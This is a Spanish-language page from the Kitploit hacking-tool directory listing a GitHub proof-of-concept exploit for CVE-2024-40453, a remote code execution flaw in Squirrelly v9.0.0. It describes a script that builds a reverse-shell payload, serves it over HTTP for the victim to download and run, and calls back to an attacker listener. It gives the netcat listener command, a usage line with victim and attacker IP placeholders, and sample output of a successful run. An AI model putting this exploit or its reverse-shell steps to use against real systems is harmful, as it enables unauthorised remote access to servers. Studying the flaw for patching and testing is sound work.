Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-40453 — CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc | Kitploit
Herramientas/GitHubGitHub/bwithe/cve-2024-40453
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubbwithe/cve-2024-40453

CVE-2024-40453

CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-40453 - Squirrelly v9.0.0 RCE

Aviso legal:

Este script es solo para fines educativos.

No lo uses para fines ilegales.

Si lo haces, es completamente tu responsabilidad; no soy responsable de ningún mal uso.

Descripción

Este script crea una reverse shell llamada payload.sh en el directorio actual.

Luego aloja un servidor http en el puerto 80 para que la víctima obtenga el payload.sh.

Se debe iniciar un listener en la máquina del atacante.

El servidor http se apaga después de 3 segundos para permitir que la víctima descargue y ejecute el payload.sh.

EXPLICACIÓN DEL EXPLOIT

Basado en la siguiente información, se desarrolló este POC. https://samuzora.com/posts/cve-2024-40453

USO

Inicia tu listener

root@kitploit:~
rlwrap nc -nvlp 3000
Descargar herramienta

Ejecuta el payload

root@kitploit:~
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!